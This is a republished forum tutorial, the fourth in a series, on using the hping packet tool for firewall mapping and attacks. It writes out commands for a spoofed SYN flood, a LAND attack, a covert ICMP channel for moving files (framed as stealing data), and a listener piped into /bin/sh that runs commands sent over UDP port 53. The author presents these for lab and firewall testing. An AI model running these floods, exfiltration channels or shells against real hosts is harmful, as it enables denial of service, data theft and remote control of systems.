Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network

Code: Select all
This paper is the work of The Master Jedi Pimpsor AKA thehorse13, who has kindly consented to it being hosted here on the TAZ.

I’d like to start by saying that I will be covering many of the basic functions along with examples and explanations why you would want to use the tool in each scenario. In addition, I will hit on several advanced features for those who are familiar with the tool but not to the point where advanced knowledge of the application is grasped. I will be borrowing verbage (in some cases) from the developer because I feel that the developer has worded things in such ways that I cannot improve upon. By no means is this a cut & paste tutorial but I would like to make everyone aware that I will be borrowing info where it makes sense. For those who have been around here for awhile, you know that I preface my tutorials with this advanced warning in the event that someone finds a sentence or two from the original man pages for the app.

Advanced Techniques: Tutorial IIII
This tutorial will go into advanced features that HPING offers. Note that *any* of the following information can be used to take down hosts and possibly destroy information if misused. Always practice on lab hosts. I assume no responsibility for damages of *any* kind that may result in the use/misuse of the following information. By continuing to read this tutorial, you agree to use the information at your own risk.

NOTE: Real word switches require a “double dash” instead of a single. Because I wrote this in word, they sometimes get fux0red when I paste in the content. Keep this in mind if an example doesn’t work for you on the first try.

Firewall Mapping: Traceroute/Firewalk Style
HPING can be used much like traceroute or firewalk only you can use TCP, UDP or ICMP packets. Let’s take a look at a TCP example…

NOTE: I have doctored the results heavily for example purposes.

[root@HorseyLand-Labs]#hping –V –I eth0 –bind –t 4 –S


–p 666

-I allows you to select the NIC used
— bind sets the ttl count to the ctrl + z key combo so that each time you hit ctrl + z the ttl increases
-t sets the initial ttl value in the header
-S SYN flag set
-p port



(eth0 S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=
7: TTL 0 during transit from ip=

Once you reach your destination, you’ll see something like this:

len=46 ip= flags=SA DF seq=33 ttl=47 id=0 win=5840 rtt=4341.3

HPING: The DoS King

The point of this section is to give you a tool to test out IDS/Firewall appliances as well as router/switch ACLs. Any numb nut can launch a DoS. Only a professional can solve the issue when discovered.

** The SYN Attack **


In the next example, we will use the –a switch to spoof the source address of the attacking host. This is to avoid sending a RST packet from the attacking host.

[root@HorseyLand-Labs]#hping –a –S –p 80 –i u10000

You can set the packet per second rate using the –i (interval) switch. You can take a shortcut and use –fast and it will use 10000 microseconds which equates to 10 packets a second. You will not see *any* response on your host because the return traffic is going to the spoofed host. Keep in mind, this can either piss off the person whos address you spoofed or cause your net admin to have a stroke. Also, the target host may go down depending upon how fast and how many packets you send.

On our W2K3 host, we see a blizzard of SYN Received messages.

C:\netstat –an –p tcp

Active Connections

Proto Local Address Foreign Address State

**SNIPPED** for brevity

Notice that the Foreign Address is the spoofed address you specified with the –a switch.

** LAND DoS Attack **

The idea behind this is quite simple – craft a packet that will connect a socket to itself. The result, if successful will cause the box to consume all of its resources and ultimately a DoS condition occurs. This test is also VERY effective when testing spoofing rules on a firewall. Simply craft a packet using the –a switch and aim it at a host in the DMZ or internal LAN. Of course this assumes that you have this information (legitimately of course). Check and see if the firewall dropped the illegal packets. If not, start writing ACLs!!

Let’s try it out…

[root@HorseyLand-Labs]#hping -S -a -p 21
HPING (eth0 S set, 40 headers + 0 data bytes

Again, you’ll see no response for reasons which should be very obvious by now. Most systems wont fall victim to this (like NT did) anymore but again, it is very helpful in firewall rule testing.

Payload (Signatures): The True Art of Packet Crafting

We’re going to look at ways to use (misuse) HPING with an actual payload. The first example will deal with UDP payloads.

Fire up any editor and create a file with some kind of text. In my example, I created a file named payload.txt with the content of HAXOR. The file resides in the same directory where I am running HPING.

[root@HorseyLand-Labs]#hping -2 –p 7 –d 50 –E payload.txt

-2 puts HPING in UDP mode
-d specifies data length
-E tells HPING to use a signature from the specified file. The file can reside anywhere, however, you’ll need to use absolute paths (i.e. /root/data/haxorfiles/filename.tx) if the file isn’t in your current working directory.

Ethereal capture of the packet:

0000 00 a0 c9 df ff 84 00 c0 4f 48 aa 72 08 00 45 00 …….. OH.r..E.
0010 00 4e db e8 00 00 40 11 3d d1 ac 1d 04 3b ac 1d .N….@. =….;..
0020 04 70 04 34 00 35 00 3a a7 90 48 41 58 4f 52 0a .p.4.5.: ..HAXOR.
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
0050 00 00 00 00 00 00 00 00 00 00 00 00 …….. ….

As you can see, this could get very ugly with a little time and imagination. While I have given you enough information to be dangerous, I have not given you enough to be an outright menace. You’ll have to practice with the items learned in this series and before long, you’ll know exactly what I mean.

HPING: File Transfers Made Easy

Up until now, you have learned how to use HPING for testing purposes, but it has a whole set of addition features – file transfer.

The listen feature will put hping in listen mode for a specific signature. The signature is simply a string for which hping will listen and parse everything in a packet after this signature. You can specify for what protocol (ICMP, UDP and TCP) to listen for. Our example will use ICMP, You can experiment with TCP and UDP if you like. One *important* thing I will mention is that HPING doesn’t give a shit what is listening on a port. So if you play with TCP transfers, be sure that you don’t bind it to a port in use otherwise, like a true vagrant, it will squat on that port and grab/send traffic until told otherwise.

Step one: Setup the listener: There are two ways to do this. The safe way, where you setup HPING to listen for data from a specific host or you can listen for traffic from any host. The safe method is achieved with the ever so surprising –safe switch. However, we wont be using this method.

On the listening host: NOTE: “signature” refers to shared secret. It must be the same on the listening host and transferring host.

[root@HorseyLand-Labs]#hping –I eth0 –listen signature –icmp
hping2 listen mode

On the transferring host:

[root@CrackHouse]#hping –I eth0 –icmp –d 100 –sign signature –file /home/example

NOTE: The –d switch is important. Be sure it is large enough because this is the value HPING uses to determine data size.

Now, on your listenig host, you will see the following appear (remember, this is the content of my file)

[root@HorseyLand-Labs]#hping –I eth0 –listen signature –icmp
hping2 listen mode

Wow, this is a nice way
To steel information if
The admin is asleep at
The wheel. I sure hope
That important information
Such as credit card #s
Aren’t in this file.

As you can see, the evil possibilities are endless.

HPING: A Trojan in disguise?

There is a file transfer technique that I did not cover in detail which will allow HPING to be set in a full duplex channel across stateless filters. This is achieved with using the –SA switch along with a TCP transfer. You are quite capable of setting this up with the knowledge gained thus far but because this is on AO, I cannot post the precise instructions. Anyway, let’s assume that we were able to set this connection up. You can execute commands on the remote machine. Yep, you read correctly.

I’ll simply provide the commands.

Local machine:
[root@HorseyLand-Labs]#hping –I eth0 –listen signature –udp -p 53 |/bin/sh
hping listen mode:

Remote Machine:
[root@CrackHouse]# echo ls >watchthis.cmd
[root@CrackHouse ]# hping -p 53 -d 100 –udp –sign
siganature –file ./watchthis.cmd

The result will be a directory listing of the remote machine appears on your local machine:

[root@HorseyLand-Labs]#hping –I eth0 –listen signature –udp -p 53 |/bin/sh
hping listen mode:

Again, the possibilities are endless.

Well that wraps up tutorial 4. In the final installment, we will examine countermeasure techniques so that you can once again sleep at night!

Well, what do all think so far?

By admin

Former Freehand Freelance Graphic Illustrator... been online since 2004 ( late starter ), blogging since 2005, presently writing a suspense-thriller e-book that began as a screenplay.

One thought on “Tutorial – HPING – Haxoris Maximus. Tut 4 in Series of 5”

Comments are closed.